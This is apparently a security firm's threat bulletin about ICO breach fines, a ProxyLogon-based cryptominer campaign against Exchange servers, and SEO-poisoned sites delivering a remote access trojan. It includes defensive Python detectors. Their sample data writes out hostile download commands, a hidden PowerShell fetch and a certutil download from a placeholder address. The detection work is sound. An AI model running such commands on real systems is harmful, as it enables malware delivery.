Neu Cyber Threats – 22nd April 2021
The Information Commissioner’s Office (ICO) hit UK businesses with £42m in data breach fines last year. Fines were given out as a result of breaches of the Privacy and Electronic Communications Regulations (PECR) and the Data Protection Act (DPA).
The largest fine was handed to British Airways with just over half of the £42.41m total being paid by the airline, following a 2018 cyber attack which saw over half a million of its customers’ details stolen by cyber criminals.
The news highlights the need for businesses to improve their data management policies and to secure the data they hold correctly. During the COVID-19 pandemic, many companies may have prioritised other areas of their business and neglected improvements to their cyber security measures. Read more on the story and what to be aware of here.
Microsoft Exchange servers have again been targeted, this time by cyber criminals hosting a malicious Monero cryptominer in what researchers called an “unusual attack”. This latest attack on Exchange servers follows the recent, infamous ProxyLogon exploit.
It has been discovered that the threat actors compromised the Exchange servers using that exploit, which has already been used in a whole range of attacks by advanced persistent threat (APT) groups to infect systems with everything from ransomware to web shells, and used the foothold to host Monero cryptomining malware.
The attack began with a PowerShell command that retrieved a file named win_r.zip from the Outlook Web Access logon path of another compromised server. On closer inspection, the .zip file was not a compressed archive at all but a batch script, which then invoked the built-in Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which were also not compressed archives.
The batch script runs an executable that appears to be a modified version of a publicly available tool called PEx64-Injector, described as being able to migrate files without requiring any administrator privileges. Once it runs on an infected system, the executable temporarily extracts the contents of the QuickCPU.dat file, which include an installer for the cryptominer and its configuration, to the file system. It then configures the miner, injects it into a running system process, deletes the evidence that it was there and exits, leaving the miner running on the system.
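As an added illustration of how a defender could spot the chain described above (this is example code, not code from the researchers' report or from Neuways), the following Python scans constructed process-creation events for two hallmarks of the attack: Exchange's IIS worker process (w3wp.exe) spawning a shell, and certutil.exe being used as a downloader. The event layout, the 203.0.113.10 address, the temp paths and the command lines are assumptions made for this example, not indicators taken from the report.

```python
import re

# Constructed sample process-creation events in a Sysmon Event ID 1 style
# (parent image, image, command line). The 203.0.113.10 address, the temp
# paths and the command lines are placeholders for this example, not IoCs.
SAMPLE_EVENTS = [
    {   # Exchange's IIS worker process launching PowerShell to fetch "win_r.zip"
        "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -nop -w hidden -c iwr http://203.0.113.10/owa/auth/win_r.zip -OutFile C:\Windows\Temp\win_r.zip",
    },
    {   # the batch script hiding inside "win_r.zip" using certutil as a downloader
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil.exe -urlcache -split -f http://203.0.113.10/owa/auth/win_s.zip C:\Windows\Temp\win_s.zip",
    },
    {   # benign: an administrator dumping a certificate with certutil
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\certutil.exe",
        "command_line": r"certutil.exe -dump C:\certs\mail.cer",
    },
    {   # benign: PowerShell started interactively from Explorer
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe Get-ChildItem C:\Users",
    },
]

SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names the event matches (empty when it looks benign)."""
    hits = []
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"]
    url = URL_RE.search(cmd)

    # Rule 1: the Exchange IIS worker process has no business starting a shell;
    # this is the post-ProxyLogon web-shell pattern regardless of what is fetched.
    if parent == "w3wp.exe" and image in SHELL_IMAGES:
        hits.append("exchange_w3wp_spawned_shell")

    # Rule 2: certutil used as a downloader (-urlcache together with a URL).
    if image == "certutil.exe" and "urlcache" in cmd.lower() and url:
        hits.append("certutil_download")

    # Rule 3: a shell pulling something that claims to be a .zip from a web server.
    if image in SHELL_IMAGES and url and url.group(0).lower().endswith(".zip"):
        hits.append("shell_downloads_zip")

    return hits


def scan(events):
    """(index, matched rules) for every event that matched at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["command_line"][:60], hits)
```

Rule 1 fires on parent/child lineage alone, which is the durable signal here: the downloaded file names and the server hosting them change between intrusions, but an Exchange worker process spawning PowerShell does not belong in normal operation.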
Researchers observed the cryptominer receiving funds on 9th March 2021, which incidentally is also when Microsoft released updates to Exchange to patch the flaws. Although the attacker lost several servers after this date and the miner’s overall activity decreased, newly compromised servers more than made up for the early losses. The ProxyLogon problem started for Microsoft in early March, when the company said it had spotted multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. The four flaws combined into a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials, giving them access to email communications and the ability to install a web shell for further exploitation within the environment.
While Microsoft has already released an out-of-band update, and the company has confirmed that 92% of affected machines have been patched, much damage has already been done to businesses whose Exchange servers were affected by the issue, and there will still be unpatched systems out there that remain vulnerable.
Cyber criminals are using search-engine optimisation (SEO) tactics to direct users searching for common business forms such as invoices, receipts or other templates to hacker-controlled Google-hosted domains.
Business users are being lured to over 100,000 malicious Google sites that appear legitimate, but instead install a remote access trojan (RAT), used to gain a foothold on a network and later infect systems with ransomware, credential-stealers, banking trojans and other malware.
Hundreds of thousands of unique, malicious web pages that contain popular business terms and keywords, including business-form related keywords like template, invoice, receipt, questionnaire and resume, were found over the last week.
Cyber criminals use Google search re-direction and drive-by-download tactics to steer unsuspecting victims to the RAT: typically, a person who visits the infected site simply executes a binary disguised as a PDF by clicking on a purported “form”, thereby infecting his or her machine. This is an increasingly common trend in malware delivery, and it speaks to the improved security of applications such as browsers that handle vulnerable code. Unfortunately, it also reveals a glaring blind spot in controls, which still allow users to execute untrusted binaries or script files at will.
The campaign is not only huge and far-reaching but sophisticated too. The common business terms serving as keywords for the threat actors’ search-optimisation strategy are convincing Google’s web crawler that the intended content meets conditions for a high page-rank score, which means the malicious sites will appear at the top of user searches, increasing the likelihood that victims will be lured to infected sites. Security heads and managers need to know that the threat group has gone to a lot of effort to compromise business professionals, spreading a wide net and using many tactics to successfully disguise their traps.
One recent incident was observed by researchers, in which a victim working in the financial industry was searching for a free version of a document online and was re-directed via Google Search to a Google sites page that was under the control of threat actors and included an embedded download button. It’s clear that the cyber criminals are targeting the right people, as someone working in the financial industry would be a “high-value target” of the campaign.
Once a RAT has been successfully installed on a victim’s computer, the hackers can upload additional malware to the device, such as a banking trojan, which could be used to hijack the online banking credentials of the business. Threat actors could also install a credential-stealer to harvest the employee’s email credentials and launch a business email compromise (BEC) scheme.
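Both campaigns above rely on a file whose contents do not match what its name claims: the Exchange chain’s win_r.zip was really a batch script, and the SEO campaign’s “form” is an executable dressed up as a PDF. The following Python, added here as an example and not code from the page or from the researchers, checks a file’s leading bytes against its extension and also flags the double-extension trick (document name, executable suffix); the sample files, including the fake batch body, are constructed inside the block.

```python
import io
import os
import zipfile


def make_real_zip():
    """Build a genuine (constructed) ZIP archive in memory for the benign sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("invoice.txt", "constructed sample content")
    return buf.getvalue()


# Constructed sample files: (name, leading bytes). The batch body and the
# "MZ" stub are stand-ins, not the real payloads from either campaign.
SAMPLE_FILES = [
    ("win_r.zip", b"@echo off\r\nrem constructed stand-in for a batch script\r\n"),
    ("Invoice_Template.pdf", b"MZ\x90\x00" + b"\x00" * 60),
    ("Receipt_Form.pdf.exe", b"MZ\x90\x00" + b"\x00" * 60),
    ("quarterly_invoice.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"),
    ("forms.zip", make_real_zip()),
]

# What the leading bytes should look like for each claimed extension.
EXPECTED = {".zip": "zip", ".pdf": "pdf", ".exe": "windows_executable", ".bat": "text"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}
EXEC_EXTS = {".exe", ".bat", ".cmd", ".scr", ".js", ".vbs"}


def sniff(data):
    """Coarse content type from magic bytes; plain printable data is reported as text."""
    if data.startswith(b"MZ"):
        return "windows_executable"
    if data.startswith(b"%PDF-"):
        return "pdf"
    if data.startswith((b"PK\x03\x04", b"PK\x05\x06")):   # local header / empty-archive EOCD
        return "zip"
    sample = data[:512]
    if sample and all(32 <= b < 127 or b in b"\r\n\t" for b in sample):
        return "text"
    return "unknown"


def check(filename, data):
    """Return (detected type, verdict): ok, mismatch, double_extension or unknown_extension."""
    stem, ext = os.path.splitext(filename.lower())
    actual = sniff(data)
    inner_ext = os.path.splitext(stem)[1]
    # "Receipt_Form.pdf.exe": the final suffix is executable, the visible one a document.
    if ext in EXEC_EXTS and inner_ext in DOC_EXTS:
        return actual, "double_extension"
    expected = EXPECTED.get(ext)
    if expected is None:
        return actual, "unknown_extension"
    return actual, ("ok" if actual == expected else "mismatch")


def quarantine_candidates(files):
    """Names of files whose claimed type disagrees with their content or naming."""
    return [name for name, data in files
            if check(name, data)[1] in ("mismatch", "double_extension")]


if __name__ == "__main__":
    for name, data in SAMPLE_FILES:
        print(f"{name:24} {check(name, data)}")
    print("quarantine:", quarantine_candidates(SAMPLE_FILES))
```

A check like this belongs at the point where a file crosses a trust boundary (mail gateway, web proxy, download folder scanner), because a user who has already clicked the “form” has no chance to notice that the PDF icon sits on an MZ header.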
Neuways advises employees to consider what types of business forms, invoices, receipts and similar documents they search for online. By storing these forms on a centralised system such as Microsoft SharePoint, colleagues can share them internally and avoid falling into the sophisticated traps laid by cyber criminals. Our Phishing Awareness Training is top-of-the-class and makes businesses safer through the education of their employees. Contact us on 01283 753333 or firstname.lastname@example.org to discuss your options with us.